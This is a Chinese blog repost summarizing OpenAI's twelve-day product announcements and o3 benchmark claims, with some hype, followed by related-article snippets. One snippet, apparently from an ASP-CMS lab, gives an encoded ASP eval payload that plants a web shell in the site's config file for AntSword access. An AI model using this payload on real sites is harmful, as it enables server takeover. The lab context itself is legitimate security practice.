【LLM】OpenAI 的DAY12汇总和o3介绍

news2025/2/7 13:08:15

note

  • o3 体现出的编程和数学能力,不仅达到了 AGI 的门槛,甚至摸到了 ASI(超级人工智能)的边。

Day 1:o1完全版,开场即巅峰

12天发布会的开场即是“炸场级”更新——o1完全版。相比此前的预览版本,o1实现了质的飞跃。

在国际数学奥林匹克预选赛题目(AIME 2024)和编程能力测试(Codeforces)中,o1的表现分别提升了50%,复杂问题处理的错误率下降了34%。此外,多模态识别的加入,让o1的应用场景成倍增长。新增的功能使其能够处理图像和文本的综合任务,例如医生分析医学影像或设计师获取创意建议。o1的实用性大幅提升,但代价也不低。o1的高性能也伴随着高价格:只有200美元的Pro版订阅用户才能享受无限使用,而普通用户仅限每日20次。

Day 2:o1-mini强化微调,专业领域精准打击

第二天的更新聚焦于o1-mini模型的强化微调。这项技术通过强化学习方向的调整,使模型的推理能力得到显著提升。

尤其在医疗、法律等复杂领域,仅需“几十个例子”甚至12个例子,就能完成有效的微调。数据显示,强化后的o1-mini模型在测试中的通过率比传统微调模型提升24%,相比未强化版本更是高出82%。

Day 3:Sora,姗姗来迟的遗憾

等待了10个月后,Sora终于亮相。这款生成视频的工具支持最长20秒、分辨率达1080p的视频生成,并配备了创新的故事板功能。

用户可以通过时间轴设计场景卡片,串联多个提示词,系统自动生成过渡效果。此外,Remix、Blend和Loop三项工具提供了更灵活的编辑能力。然而,Sora的模型能力并未升级,导致生成效果频频翻车:运动逻辑混乱、物理效果缺失,甚至出现“鬼影”。尽管OpenAI为其配备了专业工具以及故事板功能,但模型本身的能力不足严重拖了后腿。更让人不满的是,Plus用户每月仅能使用50次,Pro用户也只能在“慢速”模式下享受无限使用。

Day 4:Canvas,AI多功能工作台

Canvas的发布,是OpenAI尝试从聊天机器人向生产力工具转型的标志。Canvas是OpenAI首次尝试打造AI版Google Docs的产品。

它将智能写作、代码协作和AI智能体集成到一个工作台中:

  • 智能写作:提供实时编辑建议,优化文本质量。
  • 代码协作:内置WebAssembly Python模拟器,实现无延迟的编程体验,并具备理解代码意图的能力。
  • AI智能体:用户可定制化AI助手,完成从撰写邮件到管理任务的操作。
    Canvas的三大功能无缝集成,构成了一个多功能的创作工作室。然而,单独对比功能,其文本编辑不如Claude的Artifacts,编程便利性也逊色于Cursor。

Day 5 & Day 11:与苹果深度合作

在第五天和第十一天,OpenAI宣布了与苹果的合作成果。这次整合主要体现在三个方面:

  • 与Siri协同:Siri可将复杂任务移交给ChatGPT处理。
  • 写作工具增强:支持从零开始撰写文档、细化和总结内容。
  • 视觉智能:通过iPhone 16的相机控制功能,用户可以深入了解拍摄对象。

此外,第十一天的更新还赋予ChatGPT更多Mac工具的调用权限。这次合作,不仅巩固了OpenAI的行业地位,也显示出苹果对AI领域的更高依赖。

Day 6:视频通话功能,“HER”成真

视频通话功能让用户可以通过镜头与GPT实时互动。这一功能虽然早在5月的演示中亮相,但此次正式上线仍让人兴奋。它不仅拓展了AI的交互方式,还让人联想到电影《HER》中与AI深度连接的场景。

Day 7-10:小更新,凑数之作

这几天的更新显得较为平淡。从Projects项目功能到ChatGPT搜索升级,再到o1图像输入和4o高级语音API开放,这几天的更新被评价为“可有可无”。

  • Projects项目功能:集中管理项目文件和对话。
  • ChatGPT搜索升级:支持对话内搜索和多模态输出。
  • o1图像输入与4o高级语音API:功能开放,但无重大创新。

尽管如此,集中对话文件管理和多模态搜索等功能,仍有一定实用价值。

Day 12:GPT-o3,终极王炸

在最后一天,OpenAI用GPT-o3的发布引爆全场。

  • 相较于o1,o3在多个领域实现了跨越式进步:
  • Codeforces评分:2727,全球排名175,超过99%人类程序员。
  • 博士级科学问题(GPQA):87.7%,远超人类平均水平。
  • ARC-AGI基准测试:87.5%,展现了新型任务适应能力的飞跃。

尤其是ARC-AGI测试得分,从GPT-3的0%到GPT-4o的5%,再到o3的87.5%。
在这里插入图片描述
尽管o3的高算力成本暂时限制了普及,但它证明了Scaling Law依然有效,并将AI的发展推向新的高峰。

OpenAI o3:

  1. o3在Codeforces编程竞技中击败了99.9%的程序员,在168076名程序员中排名175名。甚至o3的作者都打不过o3。

  2. o3在编程解决真实世界需求方面也比o1有明显提升,在SWE-Bench软件开发测试中,之前发布的o1-preview是41.3%,o3是71.7%,也就是70%的真实世界需求,o3可以直接做对,并通过单元测试。也就意味着只有剩下30%的工作需要人类程序员去编码完成了,而这部分工作AI也可以帮助人类程序员大大提升效率。

  3. 在AIME 2024数学测试中做对了96.7%,相当于在美国数学奥林匹克竞赛上只答错了一道题。

  4. 在博士级别科学问题测试的GPQA Diamond中超过o1 10个百分点,而o1已经基本上是人类博士生的平均水平。

  5. 图形逻辑推理的ARC-AGI,o3经过微调后,达到87.5%,超过人类平均水平(85%)。

RFT:SFT只知道最优答案,RFT看到过多条路径,按照打分优化得分最高的那条路径生成的概率。可以简单理解为传统的PPO需要依赖训练好的奖励模型,而RFT这里甚至可以用专家规则来代替奖励模型打分。但前提是需要o1这种能生成搜索解空间的CoT大模型

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2267340.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用Kubernetes部署MySQL+WordPress

目录 前提条件 部署MySQL和WordPress 编写yaml文件 应用yaml文件 存在问题及解决方案 创建PV(持久化卷) 创建一个PVC(持久化卷声明) 部署添加PVC 查看PV对应的主机存储 删除资源 查看资源 删除deployment和service 查看主机数据 删除PVC和PV 删除主机数据 前提条…

RabbitMQ中的异步Confirm模式:提升消息可靠性的利器

在现代分布式系统中,消息队列(Message Queue)扮演着至关重要的角色,它能够解耦系统组件、提高系统的可扩展性和可靠性。RabbitMQ作为一款广泛使用的消息队列中间件,提供了多种机制来确保消息的可靠传递。其中&#xff…

sentinel限流+其他

quick-start | Sentinel sentinel 作用 限流 熔断降级 1,限制什么 QPS 并发线程数 2,限制什么 资源,什么资源 服务,方法,接口,或者一段代码 3,实现方式 配置规则 注解 其他 Java常见5种限流…

Ubuntu 中安装 RabbitMQ 教程

简介 RabbitMq作为一款消息队列产品,它由Erlang语言开发,实现AMQP(高级消息队列协议)的开源消息中间件。 应用场景 异步处理 场景说明:用户注册后,注册信息写入数据库,再发邮件、短信通知。 …

Spark生态圈

Spark 主要用于替代Hadoop中的 MapReduce 计算模型。存储依然可以使用 HDFS,但是中间结果可以存放在内存中;调度可以使用 Spark 内置的,也可以使用更成熟的调度系统 YARN 等。 Spark有完善的生态圈: Spark Core:实现了…

AT24C02学习笔记

看手册: AT24Cxx xx代表能写入xxK bit(xx K)/8 byte 内部写周期很关键,代表每一次页写或字节写结束后时间要大于5ms(延时5ms确保完成写周期),否则时序会出错。 页写:型不同号每一页可能写入不同大小的…

119.【C语言】数据结构之快速排序(调用库函数)

目录 1.C语言快速排序的库函数 1.使用qsort函数前先包含头文件 2.qsort的四个参数 3.qsort函数使用 对int类型的数据排序 运行结果 对char类型的数据排序 运行结果 对浮点型数据排序 运行结果 2.题外话:函数名的本质 1.C语言快速排序的库函数 cplusplus网的介绍 ht…

五模型对比!Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量时间序列预测

目录 预测效果基本介绍程序设计参考资料 预测效果 基本介绍 光伏功率预测!五模型对比!Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量时间序列预测(Matlab2023b 多输入单输出) 1.程序已经调试好,替换数据集后,仅运…

利用Dockerfile构建自定义镜像

当一个系统开发完成,需要将系统打包为一个镜像文件,让docker能够运行该镜像,成为一个可以被访问的容器。 上述操作可以通过自定义镜像的方式来实现,本文章基于VMware虚拟机中安装的Centos7操作系统来完成。前面的操作步骤&#x…

喜报 | 擎创科技入围上海市优秀信创解决方案

近日,由上海市经信委组织的“2024年上海市优秀信创解决方案”征集遴选活动圆满落幕,擎创科技凭借实践经验优秀的《擎创夏洛克智能预警与应急处置解决方案》成功入选“2024年上海市优秀信创解决方案”名单。 为激发创新活力,发挥标杆作用&…

基于aspose.words组件的word bytes转pdf bytes,去除水印和解决linux中文乱码问题

详情见 https://preferdoor.top/archives/ji-yu-aspose.wordszu-jian-de-word-byteszhuan-pdf-bytes

快速排序学习优化

首先&#xff0c;上图。 ‘’’ cpp int partSort(int *a ,int left,int right) {int keyi left; //做左侧基准while(left<right){while(left<right && a[right]>a[keyi]){right--;}while(left<right && a[left]<a[keyi]){left;}swap(a[left…

搭建vue项目

一、环境准备 1、安装node node官网&#xff1a;https://nodejs.org/zh-cn 1.1、打开官网&#xff0c;选择“下载”。 1.2、选择版本号&#xff0c;选择系统&#xff0c;根据需要自行选择&#xff0c;上面是命令安装方式&#xff0c;下载是下载安装包。 1.3、检查node安装…

华为管理变革之道:管理制度创新

目录 华为崛起两大因素&#xff1a;管理制度创新和组织文化。 管理是科学&#xff0c;150年来管理史上最伟大的创新是流程 为什么要变革&#xff1f; 向世界标杆学习&#xff0c;是变革第一方法论 体系之一&#xff1a;华为的DSTE战略管理体系&#xff08;解决&#xff1a…

ASP-CMS漏洞

打开aspcms靶场 账号&#xff1a;admin 密码&#xff1a;123456 去保存抓包 在slideTextStatus1后面写上%25><%25eval(request(chr(65)))%25><%25 我们在去访问这个文件config/AspCms_Config.asp再去蚁剑连接&#xff0c;连接成功

pyqt和pycharm环境搭建

安装 python安装&#xff1a; https://www.python.org/downloads/release/python-3913/ python3.9.13 64位(记得勾选Path环境变量) pycharm安装&#xff1a; https://www.jetbrains.com/pycharm/download/?sectionwindows community免费版 换源&#xff1a; pip config se…

微服务-1 认识微服务

目录​​​​​​​ 1 认识微服务 1.1 单体架构 1.2 微服务 1.3 SpringCloud 2 服务拆分原则 2.1 什么时候拆 2.2 怎么拆 2.3 服务调用 3. 服务注册与发现 3.1 注册中心原理 3.2 Nacos注册中心 3.3 服务注册 3.3.1 添加依赖 3.3.2 配置Nacos 3.3.3 启动服务实例 …

《HelloGitHub》第 105 期

兴趣是最好的老师&#xff0c;HelloGitHub 让你对编程感兴趣&#xff01; 简介 HelloGitHub 分享 GitHub 上有趣、入门级的开源项目。 github.com/521xueweihan/HelloGitHub 这里有实战项目、入门教程、黑科技、开源书籍、大厂开源项目等&#xff0c;涵盖多种编程语言 Python、…

再生核希尔伯特空间(RKHS)上的分位回归

1. 基本定义和理论基础 1.1 再生核希尔伯特空间(RKHS) 给定一个非空集合 X \mathcal{X} X&#xff0c;一个希尔伯特空间 H \mathcal{H} H 称为再生核希尔伯特空间&#xff0c;如果存在一个函数 K : X X → R K: \mathcal{X} \times \mathcal{X} \rightarrow \mathbb{R} K…

基于单片机的血氧心率检测与报警系统研制(论文+源码)

1. 系统设计 本次课题为基于单片机的血氧心率检测与报警系统研制&#xff0c;在此设计了如图2.1所示的系统结构框图&#xff0c;整个系统包括了MAX30102心率血氧检测模块&#xff0c;DS18B20体温检测模块&#xff0c;液晶显示模块&#xff0c;按键以及主控制器stm32f103单片机…